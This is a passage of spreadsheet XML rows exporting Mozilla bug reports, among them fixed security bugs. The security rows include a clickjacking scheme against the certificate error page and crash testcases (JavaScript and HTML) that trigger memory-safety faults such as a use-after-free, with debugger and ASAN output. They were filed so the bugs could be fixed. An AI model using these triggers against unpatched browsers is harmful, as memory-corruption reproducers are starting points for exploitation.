      </c>
      <c r="G5616" t="n">
        <v>3</v>
      </c>
      <c r="H5616" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5616" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5616" t="inlineStr">
        <is>
          <t>DOM: UI Events &amp; Focus Handling</t>
        </is>
      </c>
      <c r="K5616" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5616" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5616" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5616" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5616" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5616" t="inlineStr">
        <is>
          <t>[PDT+][BLOCKER][TESTCASE]</t>
        </is>
      </c>
      <c r="Q5616" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5616" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5616" t="inlineStr">
        <is>
          <t>M12</t>
        </is>
      </c>
      <c r="T5616" t="n">
        <v>1</v>
      </c>
      <c r="U5616" t="n">
        <v>0</v>
      </c>
      <c r="V5616" t="n">
        <v>15</v>
      </c>
      <c r="W5616" t="inlineStr">
        <is>
          <t>If we try to submit form onLoad event then form does not get submitted. On the
other hand form submission with button click and other ways is working fine.
Just form submission could not be done onLoad of page.
BUILDS: 1999-12-10-09. 1999-12-09-20.
STEPS TO REPRODUCE:
1]Please visit URL mentioned above with mentioned builds. [As soon as you open
this page form should get submitted and you should see resluts of cgi file.
which does not happen.]
2] Click on Submit button. [Now you can see that form got submitted, which
should have happened as soon as we load page because we are calling same submit
function onClick of this submit button.]
------- OR -------
1] Please copy HTML code I'm providing. Save it as HTML file.
2] Copy CGI code I'm providing. Save it as CGI file.
3] Change action form action in HTML file according to location of your cgi
file.
4] Open HTML file with above mentioned builds. [As soon as you open this page
form should get submitted and you should see resluts of cgi file. which does not
happen.]
5] Click on Submit button. [Now you can see that form got submitted, which
should have happened as soon as we load page because we are calling same submit
function onClick of this submit button.]
EXPECTED RESULTS:
As soon as we load the page, form submission should occur and we should see
something like follows on screen.
Text Value is: Temp Text Value
Hidden Value is: Temp Hidden Value
ACTUAL RESULTS:
Form submission does not occur onLoad event of page. We need to click submit
button to actually submit form.
TESTCASE HTML CODE START:
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Form Submission onLoad Event&lt;/title&gt;
&lt;/head&gt;
&lt;script&gt;
&lt;!--
function SubForm(){
document.workform.submit();
}
//--&gt;
&lt;/script&gt;
&lt;body onLoad="SubForm();"&gt;
&lt;form name="workform" action="http://bubblegum/desale/cgi-bin/onloadsub.cgi"
method="post" &gt;
Text to Input&lt;input type="text" name="temptext" value="Temp Text Value"
size="40"&gt;&lt;br&gt;
This is Hidden&lt;input type="hidden" name="tempsel" value="Temp Hidden Value"
&gt;&lt;br&gt;
&lt;input type=button name="button2" value="Submit" onclick="SubForm();"&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
TESTCASE HTML CODE END:
----------------------------------
TESTCASE CGI CODE START:
#!/usr/local/bin/perl
require "cgi-lib.pl";
print "Content-type: text/html", "\n\n";
MAIN:
{
&amp;ReadParse(*input);
$textval = $input{'temptext'};
$selval = $input{'tempsel'};
print "&lt;HTML&gt;\n";
print "&lt;HEAD&gt;\n";
print "&lt;TITLE&gt;CGI Test&lt;/TITLE&gt;\n";
print "&lt;/HEAD&gt;\n";
print "&lt;BODY&gt;\n";
print "&lt;H2&gt; Text Value is:    $textval&lt;/H2&gt;&lt;br&gt;\n";
print "&lt;H2&gt; Hidden Value is:    $selval&lt;/H2&gt;&lt;br&gt;\n";
print "&lt;/BODY&gt;\n";
print "&lt;/HTML&gt;\n";
}
exit(0);
TESTCASE CGI CODE END:
Now onLoad Event works fine if we try to call alert box onLoad of any page. So
onLoad event in intself is working fine. Submission process on itself is also
working fine. Just combination is not working. Means if we try submission onLoad
then it does not work.
I tried to give as much information as much I can. Let me know if you need any
more information on this.</t>
        </is>
      </c>
      <c r="X5616" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5617">
      <c r="A5617" t="n">
        <v>885551</v>
      </c>
      <c r="B5617" t="inlineStr">
        <is>
          <t>2013-06-20 15:07:44 -0700</t>
        </is>
      </c>
      <c r="C5617" t="inlineStr">
        <is>
          <t>Enter PIN screen (and all text) is displayed in English for a device set to another locale</t>
        </is>
      </c>
      <c r="D5617" t="inlineStr">
        <is>
          <t>2013-07-11 09:39:38 -0700</t>
        </is>
      </c>
      <c r="E5617" t="n">
        <v>1</v>
      </c>
      <c r="F5617" t="n">
        <v>1</v>
      </c>
      <c r="G5617" t="n">
        <v>6</v>
      </c>
      <c r="H5617" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5617" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J5617" t="inlineStr">
        <is>
          <t>Payments/Refunds</t>
        </is>
      </c>
      <c r="K5617" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L5617" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5617" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5617" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5617" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5617" t="inlineStr"/>
      <c r="Q5617" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5617" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5617" t="inlineStr">
        <is>
          <t>2013-07-11</t>
        </is>
      </c>
      <c r="T5617" t="n">
        <v>1</v>
      </c>
      <c r="U5617" t="n">
        <v>0</v>
      </c>
      <c r="V5617" t="n">
        <v>16</v>
      </c>
      <c r="W5617" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0 (Beta/Release)
Build ID: 20130511120803
Steps to reproduce:
1. Open marketplace
2. Search for a paid app
3. Click to buy
4. Start the process to create and account
Actual results:
The persona PIN screen is in English
(note: all of the PIN screens are in English, such as: wrong pin, confirmation pin, reset pin, forgot pin)
Expected results:
The interface during the PIN screens should be in Spanish</t>
        </is>
      </c>
      <c r="X5617" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5618">
      <c r="A5618" t="n">
        <v>1249338</v>
      </c>
      <c r="B5618" t="inlineStr">
        <is>
          <t>2016-02-18 09:59:20 -0800</t>
        </is>
      </c>
      <c r="C5618" t="inlineStr">
        <is>
          <t>graphite2: heap-buffer-overflow read in [@graphite2::Slot::getAttr] Slot.cpp:234</t>
        </is>
      </c>
      <c r="D5618" t="inlineStr">
        <is>
          <t>2016-09-22 14:47:52 -0700</t>
        </is>
      </c>
      <c r="E5618" t="n">
        <v>1</v>
      </c>
      <c r="F5618" t="n">
        <v>1</v>
      </c>
      <c r="G5618" t="n">
        <v>3</v>
      </c>
      <c r="H5618" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5618" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5618" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K5618" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5618" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5618" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5618" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5618" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5618" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q5618" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5618" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5618" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5618" t="n">
        <v>1</v>
      </c>
      <c r="U5618" t="n">
        <v>0</v>
      </c>
      <c r="V5618" t="n">
        <v>5</v>
      </c>
      <c r="W5618" t="inlineStr">
        <is>
          <t>Created attachment 8720872
call_stack.txt
This was found while fuzzing graphite2 revision aed0effc27edfb9da441dce3c77f5a1a3fd9f7db</t>
        </is>
      </c>
      <c r="X5618" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5619">
      <c r="A5619" t="n">
        <v>633691</v>
      </c>
      <c r="B5619" t="inlineStr">
        <is>
          <t>2011-02-11 22:02:38 -0800</t>
        </is>
      </c>
      <c r="C5619" t="inlineStr">
        <is>
          <t>Mitigate clickjacking of about:certerror</t>
        </is>
      </c>
      <c r="D5619" t="inlineStr">
        <is>
          <t>2024-06-02 18:39:42 -0700</t>
        </is>
      </c>
      <c r="E5619" t="n">
        <v>1</v>
      </c>
      <c r="F5619" t="n">
        <v>1</v>
      </c>
      <c r="G5619" t="n">
        <v>2</v>
      </c>
      <c r="H5619" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5619" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5619" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5619" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5619" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5619" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5619" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5619" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5619" t="inlineStr">
        <is>
          <t>[sg:moderate][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q5619" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5619" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5619" t="inlineStr">
        <is>
          <t>Firefox 11</t>
        </is>
      </c>
      <c r="T5619" t="n">
        <v>1</v>
      </c>
      <c r="U5619" t="n">
        <v>1</v>
      </c>
      <c r="V5619" t="n">
        <v>36</v>
      </c>
      <c r="W5619" t="inlineStr">
        <is>
          <t>A site colluding with a MITM attacker can show a fake about:certerror page with the "Add Exception" button of a real about:certerror page for another site showing through an iframe.  If the user judges the front site unimportant and fails to recheck the hostname in the "Add Security Exception" dialog, his/her communications with the back site are compromised.
I have linked a demo for Firefox 3.6 and 4 that targets www.cacert.org (so it will not work if you have the CAcert root enabled or already have a cert override for this site).  The demo assumes browser.xul.error_pages.expert_bad_cert is enabled.  In a real attack, I think one could avoid this assumption by supplying a cert with a related hostname so that the "Technical Details" section of the back page expands and then letting the entire "I Understand the Risks" section (including the toggle) show through.  The only problem is that the width of the errorPageContainer may change when this section opens, and I'm not sure how to make it change on both the front and back pages.
Please consider mitigating this attack.  One possibility: when about:certerror loads in a frame, it could say in place of the button, "To add an exception, you need to &lt;a&gt;open this page in a new tab&lt;/a&gt;."
I'm marking the bug private as a precaution.  Please feel free to open it if you judge that it does not need this protection.</t>
        </is>
      </c>
      <c r="X5619" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5620">
      <c r="A5620" t="n">
        <v>1821959</v>
      </c>
      <c r="B5620" t="inlineStr">
        <is>
          <t>2023-03-12 22:17:42 -0700</t>
        </is>
      </c>
      <c r="C5620" t="inlineStr">
        <is>
          <t>MOZ_DIAGNOSTIC_ASSERT in mozjemalloc from background thread free()</t>
        </is>
      </c>
      <c r="D5620" t="inlineStr">
        <is>
          <t>2024-05-30 11:06:49 -0700</t>
        </is>
      </c>
      <c r="E5620" t="n">
        <v>1</v>
      </c>
      <c r="F5620" t="n">
        <v>1</v>
      </c>
      <c r="G5620" t="n">
        <v>3</v>
      </c>
      <c r="H5620" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5620" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5620" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5620" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5620" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5620" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5620" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5620" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5620" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main112+][adv-esr102.10+]</t>
        </is>
      </c>
      <c r="Q5620" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5620" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5620" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T5620" t="n">
        <v>1</v>
      </c>
      <c r="U5620" t="n">
        <v>0</v>
      </c>
      <c r="V5620" t="n">
        <v>25</v>
      </c>
      <c r="W5620" t="inlineStr">
        <is>
          <t>When run this following javascript code, gecko fail at mozjemalloc
```
const v1 = this.transplantableObject();
const v2 = v1.object;
for (let v3 = 0; v3 &lt; 100; v3++) {
    const v5 = String.fromCharCode();
    const v8 = [v5];
    Reflect.apply(([v5,v5,v5,v5,v5]).unshift, v2, v8);
}
v1.transplant(newGlobal());
```
DEBUG
```
/*
Assertion failure: diff == regind * size, at /home/s/gecko-dev/memory/build/mozjemalloc.cpp:2515  
In file: /home/s/gecko-dev/memory/build/mozjemalloc.cpp 
   2510 
   2511   MOZ_ASSERT(diff &lt;=
   2512              (static_cast&lt;unsigned&gt;(bin-&gt;mRunSizePages) &lt;&lt; gPageSize2Pow));
   2513   regind = diff / bin-&gt;mSizeDivisor;
   2514 
 ► 2515   MOZ_DIAGNOSTIC_ASSERT(diff == regind * size);
   2516   MOZ_DIAGNOSTIC_ASSERT(regind &lt; bin-&gt;mRunNumRegions);
   2517 
   2518   elm = regind &gt;&gt; (LOG2(sizeof(int)) + 3);
   2519   if (elm &lt; run-&gt;mRegionsMinElement) {
   2520     run-&gt;mRegionsMinElement = elm;
──────────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffff6bff9b0 —▸ 0x7ffff7900d80 ◂— 0x947d3d24
01:0008│     0x7ffff6bff9b8 —▸ 0x7ffff6e07001 ◂— 0x880000001f384adf
02:0010│     0x7ffff6bff9c0 —▸ 0x7ffff7900d80 ◂— 0x947d3d24
03:0018│     0x7ffff6bff9c8 —▸ 0x7ffff6e00000 —▸ 0x7ffff7900d80 ◂— 0x947d3d24
04:0020│     0x7ffff6bff9d0 —▸ 0x7ffff7900da0 ◂— 0x2
05:0028│     0x7ffff6bff9d8 —▸ 0x7ffff6e0a858 ◂— 0xe5e5e5e5e5e5e5e5
06:0030│ rbp 0x7ffff6bff9e0 —▸ 0x7ffff6bffa20 —▸ 0x7ffff6bffb50 —▸ 0x7ffff6bffba0 —▸ 0x7ffff6bffc20 ◂— ...
07:0038│     0x7ffff6bff9e8 —▸ 0x555556dab580 (arena_dalloc(void*, unsigned long, arena_t*)+176) ◂— jmp 0x555556dab5c6
────────────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────────────────────────────
 ► f 0   0x555556db066d arena_t::DallocSmall(arena_chunk_t*, void*, arena_chunk_map_t*)+1021
   f 1   0x555556db066d arena_t::DallocSmall(arena_chunk_t*, void*, arena_chunk_map_t*)+1021
   f 2   0x555556dab580 arena_dalloc(void*, unsigned long, arena_t*)+176
   f 3   0x55555777669d js::gc::GCRuntime::freeFromBackgroundThread(js::AutoLockHelperThreadState&amp;)+781
   f 4   0x55555777669d js::gc::GCRuntime::freeFromBackgroundThread(js::AutoLockHelperThreadState&amp;)+781
   f 5   0x55555777669d js::gc::GCRuntime::freeFromBackgroundThread(js::AutoLockHelperThreadState&amp;)+781
   f 6   0x5555577043e6 js::GCParallelTask::runTask(JS::GCContext*, js::AutoLockHelperThreadState&amp;)+118
   f 7   0x5555577046ac js::GCParallelTask::runHelperThreadTask(js::AutoLockHelperThreadState&amp;)+172
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg&gt; bt
#0  arena_run_reg_dalloc (run=&lt;optimized out&gt;, bin=&lt;optimized out&gt;, ptr=&lt;optimized out&gt;, size=&lt;optimized out&gt;) at /home/s/gecko-dev/memory/build/mozjemalloc.cpp:2515
#1  arena_t::DallocSmall (this=this@entry=0x7ffff7900d80, aChunk=aChunk@entry=0x7ffff6e00000, aPtr=aPtr@entry=0x7ffff6e0a858, aMapElm=&lt;optimized out&gt;) at /home/s/gecko-dev/memory/build/mozjemalloc.cpp:3652
#2  0x0000555556dab580 in arena_dalloc (aPtr=0x7ffff6e0a858, aOffset=&lt;optimized out&gt;, aArena=&lt;optimized out&gt;) at /home/s/gecko-dev/memory/build/mozjemalloc.cpp:3743
#3  0x000055555777669d in js_free (p=0x7ffff7c4ea60 &lt;_IO_stdfile_2_lock&gt;) at /home/s/gecko-dev/obj-fuzzbuild/dist/include/js/Utility.h:414
#4  JS::GCContext::freeUntracked (p=0x7ffff7c4ea60 &lt;_IO_stdfile_2_lock&gt;, this=&lt;optimized out&gt;) at /home/s/gecko-dev/js/src/gc/GCContext.h:117
#5  js::gc::GCRuntime::freeFromBackgroundThread (this=0x7ffff6e23728, lock=...) at /home/s/gecko-dev/js/src/gc/Sweeping.cpp:477
#6  0x00005555577043e6 in js::GCParallelTask::runTask (this=this@entry=0x7ffff6e250b8, gcx=gcx@entry=0x7ffff6bffbb0, lock=...) at /home/s/gecko-dev/js/src/gc/GCParallelTask.cpp:209
#7  0x00005555577046ac in js::GCParallelTask::runHelperThreadTask (this=0x7ffff6e250b8, lock=...) at /home/s/gecko-dev/js/src/gc/GCParallelTask.cpp:193
#8  0x0000555556fe8967 in js::GlobalHelperThreadState::runTaskLocked (this=this@entry=0x7ffff6e0f000, task=0x7ffff7c4ea60 &lt;_IO_stdfile_2_lock&gt;, locked=...) at /home/s/gecko-dev/js/src/vm/HelperThreads.cpp:2767
#9  0x0000555556fe8710 in js::GlobalHelperThreadState::runOneTask (this=0x7ffff6e0f000, lock=...) at /home/s/gecko-dev/js/src/vm/HelperThreads.cpp:2736
#10 0x0000555556ffa9a2 in js::HelperThread::threadLoop (this=this@entry=0x7ffff6e1c0a0, pool=pool@entry=0x7ffff6e17200) at /home/s/gecko-dev/js/src/vm/InternalThreadPool.cpp:282
#11 0x0000555556ffa75c in js::HelperThread::ThreadMain (pool=0x7ffff6e17200, helper=0x7ffff6e1c0a0) at /home/s/gecko-dev/js/src/vm/InternalThreadPool.cpp:225
#12 0x000055555700cee8 in js::detail::ThreadTrampoline&lt;void (&amp;)(js::InternalThreadPool*, js::HelperThread*), js::InternalThreadPool*&amp;, js::HelperThread*&gt;::callMain&lt;0ul, 1ul&gt; (this=0x7ffff6e195f0) at /home/s/gecko-dev/js/s
rc/threading/Thread.h:220
#13 js::detail::ThreadTrampoline&lt;void (&amp;)(js::InternalThreadPool*, js::HelperThread*), js::InternalThreadPool*&amp;, js::HelperThread*&gt;::Start (aPack=0x7ffff6e195f0) at /home/s/gecko-dev/js/src/threading/Thread.h:209
#14 0x00007ffff7ac7b43 in start_thread (arg=&lt;optimized out&gt;) at ./nptl/pthread_create.c:442
#15 0x00007ffff7b59a00 in clone3 () at ../sysdeps/unix/sysv/linux/x86_64/clone3.S:81
*/
```</t>
        </is>
      </c>
      <c r="X5620" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5621">
      <c r="A5621" t="n">
        <v>1569756</v>
      </c>
      <c r="B5621" t="inlineStr">
        <is>
          <t>2019-07-29 13:17:18 -0700</t>
        </is>
      </c>
      <c r="C5621" t="inlineStr">
        <is>
          <t>Crash in [@ mozilla::ShellExecuteByExplorer]</t>
        </is>
      </c>
      <c r="D5621" t="inlineStr">
        <is>
          <t>2022-01-10 05:09:38 -0800</t>
        </is>
      </c>
      <c r="E5621" t="n">
        <v>1</v>
      </c>
      <c r="F5621" t="n">
        <v>1</v>
      </c>
      <c r="G5621" t="n">
        <v>3</v>
      </c>
      <c r="H5621" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5621" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5621" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K5621" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5621" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5621" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N5621" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5621" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5621" t="inlineStr"/>
      <c r="Q5621" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5621" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5621" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T5621" t="n">
        <v>1</v>
      </c>
      <c r="U5621" t="n">
        <v>0</v>
      </c>
      <c r="V5621" t="n">
        <v>11</v>
      </c>
      <c r="W5621" t="inlineStr">
        <is>
          <t>This bug is for crash report bp-d8aef9c7-6eac-4049-a8bf-269e20190725.
Seen while looking at nightly crashes - these crashes started in 20190724220024: https://bit.ly/2Ka2B7O. 12 crashes/8 installs so far.
Possible regression range based on Build ID: https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=69ac304560c98a733d44a0245fe9782dc6a465e2&amp;tochange=1da5a37de0fd1695e96a9d5e7f59fbd84d8759b2
Bug 1567614? ni on Aaron
```
Top 10 frames of crashing thread:
0 xul.dll static class mozilla::Result&lt;mozilla::Ok, mozilla::WindowsError&gt; mozilla::ShellExecuteByExplorer widget/windows/ShellHeaderOnlyUtils.h:76
1 xul.dll static class mozilla::Result&lt;mozilla::Ok, mozilla::WindowsError&gt; mozilla::ShellExecuteByExplorer widget/windows/ShellHeaderOnlyUtils.h:203
2 xul.dll nsMIMEInfoWin::LoadUriInternal uriloader/exthandler/win/nsMIMEInfoWin.cpp:242
3 xul.dll nsExternalHelperAppService::LoadURI uriloader/exthandler/nsExternalHelperAppService.cpp:1010
4 xul.dll mozilla::dom::ContentParent::RecvLoadURIExternal dom/ipc/ContentParent.cpp:3851
5 xul.dll mozilla::dom::PContentParent::OnMessageReceived ipc/ipdl/PContentParent.cpp:7051
6 xul.dll mozilla::ipc::MessageChannel::DispatchMessage ipc/glue/MessageChannel.cpp:2108
7 xul.dll mozilla::ipc::MessageChannel::MessageTask::Run ipc/glue/MessageChannel.cpp:1986
8 xul.dll nsThread::ProcessNextEvent xpcom/threads/nsThread.cpp:1225
9 xul.dll NS_ProcessNextEvent xpcom/threads/nsThreadUtils.cpp:486
```</t>
        </is>
      </c>
      <c r="X5621" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5622">
      <c r="A5622" t="n">
        <v>1072847</v>
      </c>
      <c r="B5622" t="inlineStr">
        <is>
          <t>2014-09-25 02:02:12 -0700</t>
        </is>
      </c>
      <c r="C5622" t="inlineStr">
        <is>
          <t>Crash [@ _moz_cairo_surface_destroy] with long DOM Notification, only on Windows</t>
        </is>
      </c>
      <c r="D5622" t="inlineStr">
        <is>
          <t>2015-08-07 18:47:48 -0700</t>
        </is>
      </c>
      <c r="E5622" t="n">
        <v>1</v>
      </c>
      <c r="F5622" t="n">
        <v>1</v>
      </c>
      <c r="G5622" t="n">
        <v>3</v>
      </c>
      <c r="H5622" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5622" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5622" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K5622" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5622" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5622" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5622" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5622" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5622" t="inlineStr">
        <is>
          <t>[adv-main34+][adv-esr31.3+]</t>
        </is>
      </c>
      <c r="Q5622" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5622" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5622" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T5622" t="n">
        <v>1</v>
      </c>
      <c r="U5622" t="n">
        <v>0</v>
      </c>
      <c r="V5622" t="n">
        <v>27</v>
      </c>
      <c r="W5622" t="inlineStr">
        <is>
          <t>Created attachment 8495128
testcase</t>
        </is>
      </c>
      <c r="X5622" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5623">
      <c r="A5623" t="n">
        <v>1376087</v>
      </c>
      <c r="B5623" t="inlineStr">
        <is>
          <t>2017-06-24 04:33:44 -0700</t>
        </is>
      </c>
      <c r="C5623" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsImageLoadingContent::Notify</t>
        </is>
      </c>
      <c r="D5623" t="inlineStr">
        <is>
          <t>2024-05-30 09:34:42 -0700</t>
        </is>
      </c>
      <c r="E5623" t="n">
        <v>1</v>
      </c>
      <c r="F5623" t="n">
        <v>1</v>
      </c>
      <c r="G5623" t="n">
        <v>3</v>
      </c>
      <c r="H5623" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5623" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5623" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5623" t="inlineStr">
        <is>
          <t>37 Branch</t>
        </is>
      </c>
      <c r="L5623" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5623" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5623" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5623" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5623" t="inlineStr">
        <is>
          <t>[adv-main55+][adv-esr52.3+]</t>
        </is>
      </c>
      <c r="Q5623" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5623" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5623" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T5623" t="n">
        <v>1</v>
      </c>
      <c r="U5623" t="n">
        <v>0</v>
      </c>
      <c r="V5623" t="n">
        <v>18</v>
      </c>
      <c r="W5623" t="inlineStr">
        <is>
          <t>Created attachment 8881021
crash.html (testcase, crashes firefox)
The latest ASAN build of Firefox 52.2.1 ESR (BuildID=20170621154102) crash when loading the following testcase. It requires 1px.png in the same directory (or any other PNG file).
&lt;script&gt;
function start() {
	o0=document.createElement('iframe');
	document.body.appendChild(o0);
	o1=open('1px.png','popup46','height=16');
	o1.onload=fun0;
	o2=o0.contentDocument;
}
function fun0(e) {
        o10=window.open('data:text/html,&lt;div&gt;','popup68','left=74');
        o10.onload=fun1;
	o13=e.target;
	tmpall=o13.getElementsByTagName('*');
	o19=tmpall[8];
}
function fun1(e) {
	o21=e.target;
	o71=o2.createElementNS('http://www.w3.org/2000/svg','filter');
	o92=o2.createElementNS('http://www.w3.org/2000/svg','feBlend');
	o71.appendChild(o92);
	tmpall[0].appendChild(o71);
	o111=o21.createElementNS('http://www.w3.org/2000/svg','filter');
	o145=o21.createElementNS('http://www.w3.org/2000/svg','feMerge');
	o111.appendChild(o145);
	o71.insertBefore(o111,o92);
	o207=o13.createElementNS('http://www.w3.org/1999/xhtml','style');
	o208=o13.createTextNode("*{ display: ruby-text-container;}");
	o207.appendChild(o208);
	o145.appendChild(o207);
	o19.setAttribute('src', '1px.png?1');
	setTimeout("location.reload()",100);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==2364==ERROR: AddressSanitizer: heap-use-after-free on address 0x602000457ab8 at pc 0x7f1895b2c8e4 bp 0x7ffd0904f1d0 sp 0x7ffd0904f1c8
READ of size 8 at 0x602000457ab8 thread T0
    #0 0x7f1895b2c8e3 in nsImageLoadingContent::Notify(imgIRequest*, int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) /home/worker/workspace/build/src/dom/base/nsImageLoadingContent.cpp:155:24
